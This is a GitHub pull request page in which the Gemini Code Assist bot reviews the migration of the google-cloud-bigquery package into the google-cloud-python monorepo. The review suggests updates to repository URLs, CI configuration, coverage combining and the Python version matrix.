  • packages/google-cloud-bigquery/google/cloud/bigquery/exceptions.py
    • Added custom exception classes for BigQuery client.
  • packages/google-cloud-bigquery/google/cloud/bigquery/external_config.py
    • Added classes for external data source configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/format_options.py
    • Added classes for BigQuery format options like Avro and Parquet.
  • packages/google-cloud-bigquery/google/cloud/bigquery/iam.py
    • Added IAM policy definitions for BigQuery.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/init.py
    • Added job package initialization, importing various job types and configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/base.py
    • Added base classes and helpers for BigQuery job types.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/copy_.py
    • Added classes for copy jobs and their configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/extract.py
    • Added classes for extract jobs and their configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/load.py
    • Added classes for load jobs and their configurations.
Activity
  • The pull request description specifies that it should be merged with a merge-commit, not a squash-commit, to preserve git history.
Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature Command Description
Code Review /gemini review Performs a code review for the current pull request in its current state.
Pull Request Summary /gemini summary Provides a summary of the current pull request in its current state.
Comment @gemini-code-assist Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help /gemini help Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

  1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution.

Copy link
Contributor

@gemini-code-assist gemini-code-assist bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request includes changes to the google-cloud-bigquery package, including updates to issue tracker URLs, test matrix configurations, Kokoro build file paths, repository names in contributing guides, and version-specific warnings. It also addresses potential issues with the coverage combine command and flakybot execution in Kokoro. The review comments suggest updating hardcoded URLs to reflect the new monorepo structure, removing premature Python versions from test matrices, improving the robustness of coverage reporting, and ensuring the existence of flakybot before execution. Additionally, the repo field in .repo-metadata.json and URLs in the contributing guide are updated to reflect the new package location, and the version in the contributing guide is updated to be more general.

Note: Security Review is unavailable for this PR.

I am having trouble creating individual review comments. Click here to see my feedback.

packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/bug_report.md (13)

medium

The issue tracker URL is hardcoded to the old repository name. It should be updated to reflect the new package location within the monorepo, or a more general issue tracker if applicable.

  - Search the issues already opened: https://github.com/googleapis/google-cloud-python/issues?q=is%3Aissue+label%3Acomponent%3Abigquery

packages/google-cloud-bigquery/.github/PULL_REQUEST_TEMPLATE.md (2)

medium

The URL for opening a new issue is hardcoded to the old repository name. It should be updated to reflect the new package location within the monorepo, or a more general issue creation link if applicable.

- [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/google-cloud-python/issues/new/choose?labels=component%3Abigquery) before writing your code!  That way we can discuss the change, evaluate designs, and agree on the general idea

packages/google-cloud-bigquery/.github/workflows/unittest.yml (11)

medium

Including Python 3.14 in the test matrix might be premature as it is not yet officially released. This could lead to unexpected build failures or instability. Consider removing it until it reaches a stable release, or explicitly target a pre-release version if that's the intent.

        python: ['3.9', '3.10', '3.11', '3.12', '3.13']

packages/google-cloud-bigquery/.github/workflows/unittest.yml (40)

medium

Similar to the general unit test matrix, including Python 3.14 here might be premature. Consider removing it until it reaches a stable release.

        python: ['3.9']

packages/google-cloud-bigquery/.github/workflows/unittest.yml (87)

medium

The coverage combine command might not correctly locate the .coverage files if unzip extracts them into subdirectories (e.g., .coverage-results/coverage-artifact-3.9/.coverage-3.9). It's more robust to use find to locate the files explicitly.

        coverage combine $(find .coverage-results -type f -name '.coverage*')

packages/google-cloud-bigquery/.kokoro/build.sh (47-48)

medium

It's good practice to check if flakybot exists before attempting to chmod +x and execute it. This prevents potential errors if the file is missing.

  if [[ -f "$KOKORO_GFILE_DIR/linux_amd64/flakybot" ]]; then
    chmod +x $KOKORO_GFILE_DIR/linux_amd64/flakybot
    $KOKORO_GFILE_DIR/linux_amd64/flakybot
  fi

packages/google-cloud-bigquery/.kokoro/continuous/common.cfg (17)

medium

The build_file path refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

build_file: "packages/google-cloud-bigquery/.kokoro/trampoline.sh"

packages/google-cloud-bigquery/.kokoro/continuous/common.cfg (26)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/build.sh"

packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg (17)

medium

The build_file path refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

build_file: "packages/google-cloud-bigquery/.kokoro/trampoline.sh"

packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg (26)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/build.sh"

packages/google-cloud-bigquery/.kokoro/samples/lint/common.cfg (18)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.10/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.11/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.12/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.13/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.14/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.9/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh (36)

medium

Explicitly using python3.9 might be too restrictive. Consider using python3 or relying on the PATH to find the appropriate Python interpreter, unless 3.9 is a strict requirement for this specific step.

python3 -m pip install --upgrade --quiet nox virtualenv

packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh (79)

medium

Explicitly using python3.9 might be too restrictive. Consider using python3 or relying on the PATH to find the appropriate Python interpreter, unless 3.9 is a strict requirement for this specific step.

    python3 -m nox -s "$RUN_TESTS_SESSION"

packages/google-cloud-bigquery/.repo-metadata.json (10)

medium

The repo field refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    "repo": "googleapis/google-cloud-python/packages/google-cloud-bigquery",

packages/google-cloud-bigquery/CONTRIBUTING.rst (38)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

  ``google-cloud-bigquery`` `repo`_ on GitHub.

packages/google-cloud-bigquery/CONTRIBUTING.rst (41)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

- Clone your fork of ``google-cloud-bigquery`` from your GitHub account to your local

packages/google-cloud-bigquery/CONTRIBUTING.rst (50)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

   # Configure remotes such that you can pull changes from the googleapis/google-cloud-python

packages/google-cloud-bigquery/CONTRIBUTING.rst (63)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

  version of ``google-cloud-bigquery``. The

packages/google-cloud-bigquery/CONTRIBUTING.rst (210)

medium

The version google-cloud-bigquery==1.28.0 might be outdated. Consider updating it to the latest relevant version or removing the specific version number if it's meant to be a general example.

The last version of this library compatible with Python 2.7 and 3.5 is
`google-cloud-bigquery==2.x.x`.

packages/google-cloud-bigquery/CONTRIBUTING.rst (241)

medium

The URL for the noxfile.py config refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

.. _config: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/noxfile.py

packages/google-cloud-bigquery/README.rst (15)

medium

The URL for general availability points to the monorepo's README. It should be updated to point to the specific google-cloud-bigquery package's GA status within the monorepo, or a more specific GA policy if available.

.. |GA| image:: https://img.shields.io/badge/support-GA-gold.svg
   :target: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/README.rst#general-availability

packages/google-cloud-bigquery/README.rst (62)

medium

The version google-cloud-bigquery==1.28.0 might be outdated. Consider updating it to the latest relevant version or removing the specific version number if it's meant to be a general example.

The last version of this library compatible with Python 2.7 and 3.5 is
`google-cloud-bigquery==2.x.x`.

packages/google-cloud-bigquery/benchmark/benchmark.py (73)

medium

The _parse_tag function assumes that a colon will always be present in the tag string. If a tag is provided without a value (e.g., --tag somekeywithnovalue), split(":")will return a list with one element, causing aValueError`. The function should handle tags without values gracefully.

    parts = tagstring.split(":", 1)
    key = parts[0]
    value = parts[1] if len(parts) > 1 else ""

packages/google-cloud-bigquery/benchmark/benchmark.py (229)

medium

Comparing datetime.fromisoformat(time_str) directly to datetime.min might be problematic if time_str is not a valid ISO format string or if datetime.min is not the intended sentinel. It's generally safer to check if time_str is an empty string or a specific sentinel value before conversion, or to use a try-except block for fromisoformat.

    return time_str == datetime.min.isoformat()

packages/google-cloud-bigquery/docs/conf.py (159)

medium

The github_repo setting refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    "github_repo": "google-cloud-python/packages/google-cloud-bigquery",

packages/google-cloud-bigquery/docs/conf.py (241)

medium

The URL for the noxfile.py config refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

.. _config: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/noxfile.py

packages/google-cloud-bigquery/docs/design/query-retries.md (24)

medium

The URL for the api_method parameter refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

was [added via the `api_method`
parameter](https://github.com/googleapis/google-cloud-python/pull/967) and is

packages/google-cloud-bigquery/docs/design/query-retries.md (33)

medium

The URLs for requested features refer to the old repository name or the monorepo. They should be updated to reflect the new package location within the monorepo.

The ability to re-issue a query automatically was a [long](https://github.com/googleapis/google-cloud-python/issues/5555) [requested](https://github.com/googleapis/google-cloud-python/issues/14) [feature](https://github.com/googleapis/google-cloud-python/issues/539). As work ramped up on the SQLAlchemy connector, it became clear that this feature was necessary to keep the test suite, which issues hundreds of queries, from being [too flakey](https://github.com/googleapis/python-bigquery-sqlalchemy/issues?q=is%3Aissue+is%3Aclosed+author%3Aapp%2Fflaky-bot+sort%3Acreated-asc).

packages/google-cloud-bigquery/docs/design/query-retries.md (38)

medium

The URL for re-issuing a query refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

client re-issues a
query](https://github.com/googleapis/google-cloud-python/pull/837) as it was

packages/google-cloud-bigquery/docs/design/query-retries.md (96-97)

medium

The issue URL refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

strictly needed 
([Issue #1122](https://github.com/googleapis/google-cloud-python/issues/1122)
has been opened to investigate this).

packages/google-cloud-bigquery/docs/snippets.py (121-124)

medium

The issue URL for flaky update_table() points to the monorepo. It should be updated to point to the specific google-cloud-bigquery package within the monorepo if possible, or be updated to a more general link if the old issue is no longer relevant.

@pytest.mark.skip(
    reason=(
        "update_table() is flaky "
        "https://github.com/googleapis/google-cloud-python/issues/5589?q=is%3Aissue+label%3Acomponent%3Abigquery"
    )
)

packages/google-cloud-bigquery/docs/snippets.py (158-161)

medium

The issue URL for flaky update_table() points to the monorepo. It should be updated to point to the specific google-cloud-bigquery package within the monorepo if possible, or be updated to a more general link if the old issue is no longer relevant.

@pytest.mark.skip(
    reason=(
        "update_table() is flaky "
        "https://github.com/googleapis/google-cloud-python/issues/5589?q=is%3Aissue+label%3Acomponent%3Abigquery"
    )
)

packages/google-cloud-bigquery/google/cloud/bigquery/init.py (128-136)

medium

The warning about Python 3.7 and 3.8 support might be outdated or too broad, given that the unittest.yml file supports Python 3.9+. Consider updating the warning to reflect the actual supported versions or adjusting the CI configuration if 3.7/3.8 are still intended to be supported with a warning.

if sys_major == 3 and sys_minor in (9, 10):
    warnings.warn(
        "The python-bigquery library no longer supports Python 3.9 "
        "and Python 3.10. "
        f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We "
        "recommend that you update soon to ensure ongoing support. For "
        "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)",
        FutureWarning,
    )

@parthea parthea added the do not merge Indicates a pull request not ready for merge, due to either quality or timing. label Mar 2, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

do not merge Indicates a pull request not ready for merge, due to either quality or timing.

Projects

None yet

Development

Successfully merging this pull request may close these issues.